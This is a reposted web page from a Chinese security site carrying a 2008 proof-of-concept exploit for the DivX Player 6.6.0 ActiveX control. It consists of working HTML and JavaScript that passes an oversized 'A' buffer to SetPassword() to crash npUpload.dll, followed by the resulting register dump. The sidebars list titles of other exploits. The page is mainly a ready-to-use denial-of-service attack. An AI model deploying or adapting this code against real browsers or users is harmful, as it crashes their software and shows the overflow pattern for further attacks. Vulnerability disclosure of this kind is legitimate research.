DivX Player 6.6.0 ActiveX SetPassword() Denial of Service PoC

首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

DivX Player 6.6.0 ActiveX SetPassword() Denial of Service PoC

来源：www.vfocus.net 作者：shir 发布时间：2008-01-03

<object id="divx" classid="clsid:D050D736-2D21-4723-AD58-5B541FFB6C11" style="display:none;">
</object>

<script>
function crash() {
var buff = '';
for(i=0;i<=500;i++) {buff+="AAAAAAAAAA";}

object = document.getElementById("divx");
object.SetPassword(buff);
}
</script>

<pre>
<h3><u>DivX SetPassword (npUpload.dll) Denial of Service</u></h3>
<b>Tested on IE 7 and Divx Player 6.6.0</b>

<b>Registers:</b>

EAX 00000000
ECX FFFFFFFF
EDX 0191CA50
EBX 008E06E0
ESP 0191C9E4
EBP 0191CA50
ESI 00000000
EDI 00000000
EIP 061F2B52 npUpload.061F2B52

Access violation when reading [00000000]...

<i>Discovered by shir, 02/01/2008</i>

<a href="javascript:;" OnClick="crash()">Crash...</a>
</pre>

[

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

相关文章

·WebPortal CMS <= 0.6.0 (index.
·MyPHP Forum <= 3.0 (Final) Rem
·Vantage Linguistics AnswerWork
·Site@School <= 2.3.10 Remote B
·oneSCHOOL (all versions) admin
·DCP-Portal <= 6.11 Remote SQL
·Zenphoto 1.1.3 (rss.php albumn
·Half-Life CSTRIKE Server 1.6 D
·IBM Domino Web Access Upload M
·FlexBB <= 0.6.3 Cookies Remote
·Macrovision Installshield isus
·Eggblog <= 3.1.0 Cookies Remot

推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved